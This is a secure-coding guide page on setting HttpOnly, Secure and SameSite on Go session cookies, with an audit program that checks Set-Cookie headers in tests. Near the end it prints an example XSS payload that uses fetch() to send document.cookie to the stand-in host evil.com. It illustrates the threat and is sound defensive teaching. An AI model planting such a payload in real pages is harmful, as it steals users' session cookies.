---
title: Set HttpOnly On Session Cookies
impact: MEDIUM
impactDescription: prevents cookie theft via XSS
tags: cookies, httponly, xss, session, security
---

## Set HttpOnly On Session Cookies

The `HttpOnly` attribute tells the browser to withhold the cookie from script: it is still attached to requests as normal, but `document.cookie` and similar JavaScript APIs cannot read it. Without it, any XSS bug on the site lets injected script read the session cookie and send it to an attacker, who can then replay it from their own machine. Note that HttpOnly does not fix the XSS itself: injected script can still issue authenticated requests from the victim's browser, so treat it as one layer alongside output encoding and a Content Security Policy, not a substitute for them.

**Incorrect (no HttpOnly):**

```go
cookie := &http.Cookie{
    Name:  "session",
    Value: token,
}
// HttpOnly and Secure default to false, so the cookie is readable from
// document.cookie and is also sent over plain HTTP.
http.SetCookie(w, cookie)
```

**Correct (HttpOnly set):**

```go
cookie := &http.Cookie{
    Name:     "session",
    Value:    token,
    Path:     "/",
    HttpOnly: true,                 // Not accessible to JavaScript
    Secure:   true,                 // Only sent over HTTPS
    SameSite: http.SameSiteLaxMode, // Not attached to cross-site POSTs
}
http.SetCookie(w, cookie)
```
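Setting the flag is half the job; the other half is checking that every response that issues a session cookie actually carries it. The following is an added example, not code from the original page: it issues the cookie both ways, then drives each handler through `httptest` and audits the parsed `Set-Cookie` headers for missing `HttpOnly` or `Secure`. The cookie name `session`, the `/login` path, the `Path` and `SameSite` settings and the handler names are assumptions made for the example.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// setSessionCookie issues the session cookie with the flags this page
// recommends. The cookie name "session" and Path "/" are assumptions.
func setSessionCookie(w http.ResponseWriter, token string) {
	http.SetCookie(w, &http.Cookie{
		Name:     "session",
		Value:    token,
		Path:     "/",
		HttpOnly: true,                 // hidden from document.cookie
		Secure:   true,                 // only sent over HTTPS
		SameSite: http.SameSiteLaxMode, // not attached to cross-site POSTs
	})
}

// setSessionCookieInsecure is the "before" form: every flag left at its
// zero value, so the cookie is readable by script and sent over HTTP.
func setSessionCookieInsecure(w http.ResponseWriter, token string) {
	http.SetCookie(w, &http.Cookie{Name: "session", Value: token})
}

// Two hypothetical login handlers, one per cookie variant.
func secureHandler(w http.ResponseWriter, r *http.Request)   { setSessionCookie(w, "t0k3n") }
func insecureHandler(w http.ResponseWriter, r *http.Request) { setSessionCookieInsecure(w, "t0k3n") }

// auditCookies parses the Set-Cookie headers of a response and reports
// each cookie that lacks HttpOnly or Secure. Go's cookie parser keeps
// both attributes, so this works on any *http.Response, including one
// fetched from a live server with http.Get.
func auditCookies(resp *http.Response) []string {
	var findings []string
	for _, c := range resp.Cookies() {
		if !c.HttpOnly {
			findings = append(findings, c.Name+": missing HttpOnly")
		}
		if !c.Secure {
			findings = append(findings, c.Name+": missing Secure")
		}
	}
	return findings
}

// findingsFor drives a handler through httptest and audits the result,
// which is how the check would run inside the service's own test suite.
func findingsFor(h http.HandlerFunc) []string {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodPost, "/login", nil))
	return auditCookies(rec.Result())
}

func main() {
	fmt.Println("insecure:", findingsFor(insecureHandler)) // two findings
	fmt.Println("secure:  ", findingsFor(secureHandler))   // none
}
```

Wiring `findingsFor` into a unit test for every handler that calls `http.SetCookie` turns a one-time review into a regression check: a future refactor that drops the flag fails CI instead of shipping.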

**XSS attack example (cookie theft prevented by HttpOnly):**

```javascript
// Attacker's XSS payload: exfiltrate every cookie script can read.
// The request itself is not blocked; with HttpOnly the session cookie
// simply never appears in document.cookie, so nothing useful is sent.
fetch('https://evil.com/steal?cookie=' + encodeURIComponent(document.cookie));
// The same script can still make authenticated same-origin requests.
```

**Tools:** Browser DevTools (the Cookies panel shows an HttpOnly column), `curl -i` against the login endpoint to read the raw `Set-Cookie` header, OWASP ZAP (flags cookies without HttpOnly), Go `net/http` `http.Cookie`
